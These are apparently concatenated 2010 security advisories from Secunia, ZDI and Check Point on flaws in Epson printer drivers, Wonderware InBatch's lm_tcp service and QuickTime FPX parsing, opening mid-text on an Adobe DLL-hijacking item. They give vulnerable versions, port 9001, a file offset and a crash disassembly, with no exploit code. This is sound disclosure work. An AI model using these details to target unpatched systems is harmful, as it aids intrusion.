Pixel Bender Toolkit by Core Security Technologies. Additional information provided by Secunia Research. ORIGINAL ADVISORY: http://www.coresecurity.com/content/adobe-pixel-bender-toolkit-tbbmalloc-dll-hijacking-exploit-10-5 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The Seiko Epson printer driver installers for LP-S9000 before 4.1.11 and LP-S7100 before 4.1.7, or as downloaded from the vendor between May 2010 and 20101125, set weak permissions for the "C:\Program Files" folder, which might allow local users to bypass intended access restrictions and create or modify arbitrary files and directories. As a result, users that do not have permission to access that folder can gain access to that folder. According to the developer, printer drivers that were included with the product or downloaded from the developer website from the initial release of May 2010 through November 25, 2010 are affected by this vulnerability. Also, users of Windows Vista and later operating systems are not affected. The Epson LP-S7100 / LP-S9000 is a family of high performance printers. There is a problem with the Epson LP-S7100 / LP-S9000 driver installation, allowing local users to increase privileges. Because the default permissions for \"C:\\Program Files\" and its subdirectories are not set correctly (\"Everyone\" group is fully controlled), local users can exploit the vulnerability to overwrite any file in these folders, resulting in elevation of privilege. Local attackers can exploit this issue to gain elevated privileges on affected devices. The following driver versions are vulnerable: LP-S7100 4.1.0fi through 4.1.7fi and 4.1.0hi through 4.1.7hi LP-S9000 4.1.0fc through 4.1.11fc and 4.1.0hc through 4.1.11hc. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). Request a free trial: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: Epson LP-S7100 / LP-S9000 Drivers Insecure Default Permissions SECUNIA ADVISORY ID: SA42540 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/42540/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=42540 RELEASE DATE: 2010-12-08 DISCUSS ADVISORY: http://secunia.com/advisories/42540/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/42540/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=42540 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A security issue has been reported in Epson LP-S7100 / LP-S9000 drivers, which can be exploited by malicious, local users to gain escalated privileges. The security issue is reported in the following versions: * LP-S7100 32bit edition versions 4.1.0fi through 4.1.7fi * LP-S7100 64bit edition versions 4.1.0hi through 4.1.7hi * LP-S9000 32bit edition versions 4.1.0fc through 4.1.11fc * LP-S9000 64bit edition versions 4.1.0hc through 4.1.11hc SOLUTION: Update to a patched version and reset permissions. Please see the vendor's advisory for more details. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.epson.jp/support/misc/lps7100_9000/index.htm OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Buffer overflow in the lm_tcp service in Invensys Wonderware InBatch 8.1 and 9.0, as used in Invensys Foxboro I/A Series Batch 8.1 and possibly other products, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted request to port 9001. Invensys Wonderware InBatch and Foxboro I/A Series Batch of lm_tcp The service can experience buffer overflow. Wonderware InBatch and Foxboro I/A Batch of database lock manager (lm_tcp) The service includes 150 When copying a string to a byte buffer, a buffer overflow can occur. This service is 9001/tcp using.lm_tcp Service disruption by a third party with access to the service (DoS) An attacker may be able to attack or execute arbitrary code. RDM Embedded is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. The issue affects the 'lm_tcp' service. Failed exploit attempts may crash the application, denying service to legitimate users. The issue affects lm_tcp &lt;= 9.0.0 0248.18.0.0; other versions may also be affected. Wonderware InBatch is prone to a denial-of-service vulnerability. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM). Request a free trial: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: Wonderware InBatch / Foxboro I/A Series "lm_tcp" Buffer Overflow Vulnerability SECUNIA ADVISORY ID: SA42528 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/42528/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=42528 RELEASE DATE: 2010-12-24 DISCUSS ADVISORY: http://secunia.com/advisories/42528/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/42528/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=42528 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in Wonderware InBatch and Foxboro I/A Series Batch, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system. write 16bits with the value 0 (0x0000) to an arbitrary memory location by sending a specially crafted packet to port 9001. SOLUTION: Apply patches when available. See vendor's advisory for possible mitigation steps. PROVIDED AND/OR DISCOVERED BY: Luigi Auriemma ORIGINAL ADVISORY: Luigi Auriemma: http://aluigi.altervista.org/adv/inbatch_1-adv.txt Invensys: http://iom.invensys.com/EN/Pages/IOM_CyberSecurityUpdates.aspx OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Apple QuickTime before 7.6.9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted FlashPix file. User interaction is required in that a user must be coerced into opening up a malicious document or visiting a malicious website.The specific flaw exists within the way the application parses a particular property out of a flashpix file. The application will explicitly trust a field in the property as a length for a loop over an array of data structures. If this field's value is larger than the number of objects, the application will utilize objects outside of this array. Successful exploitation can lead to code execution under the context of the application. Versions prior to QuickTime 7.6.9 on both Mac OS X and Windows platforms are vulnerable. Apple QuickTime is a multimedia playback software developed by Apple (Apple). The software is capable of handling multiple sources such as digital video, media segments, and more. ZDI-10-259: Apple QuickTime FPX Subimage Count Out-of-bounds Counter Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-259 December 7, 2010 -- CVE ID: CVE-2010-3801 -- CVSS: 9, (AV:N/AC:L/Au:N/C:P/I:P/A:C) -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 10654. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT4447 -- Disclosure Timeline: 2010-06-01 - Vulnerability reported to vendor 2010-12-07 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Damian Put -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi . Check Point Software Technologies - Vulnerability Discovery Team (VDT) http://www.checkpoint.com/defense/ Apple Quicktime Memory Corruption when parsing FPX files CVE-2010-3801 INTRODUCTION Apple Quicktime is a "powerful media technology that works on Mac and PC with just about every popular video or audio format you come across. So you can play the digital media you want to play". QuickTime player does not properly parse .fpx media files, which causes a memory corruption by opening a malformed file with an invalid value located in PoC repro.fpx at offset 0x49. This problem was confirmed in the following versions of Apple Quicktime and browsers, other versions may be also affected. QuickTime Player version 7.6.8 (1675) in all Operating Systems QuickTime Player version 7.6.6 (1671) in all Operating Systems CVSS Scoring System The CVSS score is: 9 Base Score: 10 Temporal Score: 9 We used the following values to calculate the scores: Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:C Temporal score is: E:POC/RL:U/RC:C TRIGGERING THE PROBLEM The problem is triggered by PoC repro.fpx which causes invalid memory access in all the refered versions and is available to interested parties only. DETAILS Disassembly: 668E2387 F7C7 03000000 TEST EDI,3 668E238D 75 15 JNZ SHORT QuickT_1.668E23A4 668E238F C1E9 02 SHR ECX,2 668E2392 83E2 03 AND EDX,3 668E2395 83F9 08 CMP ECX,8 668E2398 72 2A JB SHORT QuickT_1.668E23C4 668E239A F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] <----- Crash Here EDI = 0x089A0020 ESI = 0x61626364 (3e8.e3c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=61626560 ebx=00000000 ecx=0000007f edx=00000000 esi=61626364 edi=06d80020 eip=668e239a esp=0012dfbc ebp=0012dfc4 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 668e239a f3a5 rep movs dword ptr es:[edi],dword ptr [esi] 0:000> !exploitable Exploitability Classification: PROBABLY_EXPLOITABLE Recommended Bug Title: Probably Exploitable - Read Access Violation on Block Data Move starting at QuickTime!CallComponentFunctionWithStorage+0x000000000003f20a (Hash=0x4b1e3917.0x4f031b17) This is a read access violation in a block data move, and is therefore classified as probably exploitable. CREDITS This vulnerability was discovered and researched by Rodrigo Rubira Branco from Check Point Vulnerability Discovery Team (VDT). Rodrigo Rubira Branco Senior Security Researcher Vulnerability Discovery Team (VDT) Check Point Software Technologies http://www.checkpoint.com/defense